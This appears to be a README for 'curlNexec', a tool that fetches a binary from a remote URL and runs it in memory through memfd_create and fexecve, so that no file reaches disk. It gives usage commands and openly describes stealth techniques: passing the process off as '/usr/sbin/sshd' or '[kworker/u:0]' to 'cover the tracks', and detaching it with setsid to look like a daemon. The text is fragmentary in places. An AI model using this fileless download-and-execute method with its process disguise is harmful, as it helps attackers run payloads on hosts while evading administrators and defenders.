👋 Certainly useful , mainly for fun, rougly inspired by 0x00 article
curlNexec enable us to execute a remote binary on a local machine in one step
- simple usage
- execute binary with specified program name:
curlNexec -n /usr/sbin/sshd <binary_raw_url>
- detach program execution from
setsid curlNExec [...]
ExplanationWe want to execute
writeNsleepbinary locate on a remote machine, locally.
We first start a python http server on remote. Locally we use
curlNexec and impersonate the
/usr/sbin/sshd name for the execution of the binary
writeNsleep(for stealthiness & fun)
The remote binary file is stored locally using
memfd_create syscall, which store it within a memory disk which is not mapped into the file system (ie you can't find it using
Then we execute it using
fexecve syscall (as it is currently not provided by
syscall golang library we implem it).
fexecve, we could but we reference the program to run using a file descriptor, instead of the full path.
other skill for stealthiness
Although not present on the memory disk, the running program can still be detected using
ps command for example.
- Cover the tracks with a fake program name
curlNexec --name <fake_name> <binary_raw_url> by default the name is
[kworker/u:0] 2. Detach from tty to map behaviour of deamon process
setsid curlNexec <binary_raw_url>. WIP call
setsid from code
You could still be detected with:
$ lsof | grep memfd